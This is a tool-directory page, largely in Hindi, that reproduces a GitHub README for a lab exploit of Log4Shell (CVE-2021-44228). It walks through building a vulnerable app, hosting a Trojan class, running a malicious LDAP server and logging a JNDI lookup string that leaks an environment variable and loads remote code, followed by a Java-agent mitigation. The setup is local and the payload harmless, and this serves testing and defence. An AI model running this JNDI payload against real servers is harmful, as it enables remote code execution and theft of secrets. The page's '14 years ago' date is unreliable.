Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4shell-test-exploit — Test exploit of CVE-2021-44228 | Kitploit
उपकरण/GitHubGitHub/wajda/log4shell-test-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationPayload DevelopmentLabs & Practice
GitHubwajda/log4shell-test-exploit

log4shell-test-exploit

Test exploit of CVE-2021-44228

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 (log4shell) का परीक्षण शोषण

तैयारी

root@kitploit:~
# Install Nodejs HTTP server 
npm -g i http-server

# Build victim app
cd victim-app
mvn install

# Compile Trojan
cd test-trojan
javac Trojan.java

# Build marshalsec (required Java 8)
git clone [email protected]:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

# Build log4j-jndi-be-gone
git clone [email protected]:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew

ट्रोजन पेलोड होस्ट करने वाला HTTP सर्वर शुरू करें

root@kitploit:~
cd test-trojan
http-server .

एक दुर्भावनापूर्ण LDAP सर्वर शुरू करें

देखें https://github.com/mbechler/marshalsec

root@kitploit:~
cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"

शोषण घटनाओं पर नज़र रखें (वैकल्पिक)

उस स्थिति में उपयोगी जब stderr छिपा हो

root@kitploit:~
watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'

शोषण

स्पष्टीकरण

पीड़ित एप्लिकेशन एक कमजोर log4j2 लाइब्रेरी (संस्करण 2.14.1) के माध्यम से निम्नलिखित स्ट्रिंग को लॉग करता है

root@kitploit:~
log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");

एक साथ दो हमले वेक्टर निष्पादित करता है:

  1. पर्यावरण चर ($USER इस उदाहरण में) सूँघना, जिसे marshalsec LDAP सर्वर आउटपुट में देखा जा सकता है
root@kitploit:~
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
  1. दुर्भावनापूर्ण कोड डाउनलोड और निष्पादित करता है जो संदेश !!! BUSTED !!! को पीड़ित के ऐप मानक त्रुटि स्ट्रीम पर लॉग करता है, साथ ही एक खाली /tmp/log4shell-BUSTED-* फ़ाइल बनाता है।
    इस हमले के काम करने के लिए पीड़ित सर्वर पर निम्नलिखित JVM विकल्प सक्षम होना चाहिए:
root@kitploit:~
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
निष्पादन
root@kitploit:~
cd victim-app

# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/

सुरक्षा

देखें: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support

root@kitploit:~
java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

सिस्टम-व्यापी सुरक्षा

नीचे दिए गए स्क्रिप्ट से सभी java बाइनरी को बदलें:

java.guarded

root@kitploit:~
#!/bin/bash
$(dirname "$0")/java.original "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"

उदाहरण:

root@kitploit:~
 cd $(dirname $(which java))
 sudo su
 mv java java.original
 cp java.guarded java
टूल डाउनलोड करें